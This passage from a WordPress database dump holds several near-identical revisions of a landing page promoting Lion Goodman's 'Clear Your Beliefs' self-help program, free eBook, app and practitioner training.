(1834, 2, '2014-11-20 02:37:14', '2014-11-20 07:37:14', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 02:37:14', '2014-11-20 07:37:14', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1831, 2, '2014-11-20 02:07:59', '2014-11-20 07:07:59', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 02:07:59', '2014-11-20 07:07:59', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1832, 2, '2014-11-20 02:29:12', '2014-11-20 07:29:12', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 74px;font-size: 16px;line-height: 20px;padding-bottom: 23px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 02:29:12', '2014-11-20 07:29:12', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1833, 2, '2014-11-20 02:35:40', '2014-11-20 07:35:40', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 02:35:40', '2014-11-20 07:35:40', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1835, 2, '2014-11-20 19:22:06', '2014-11-21 00:22:06', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 74px;font-size: 16px;line-height: 20px;padding-bottom: 23px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 19:22:06', '2014-11-21 00:22:06', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1836, 2, '2014-11-20 19:27:08', '2014-11-21 00:27:08', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 74px;font-size: 16px;line-height: 20px;padding-bottom: 23px"><strong>Clear Your Limiting and\nNegative Beliefs</strong> <strong>\n- Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 19:27:08', '2014-11-21 00:27:08', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
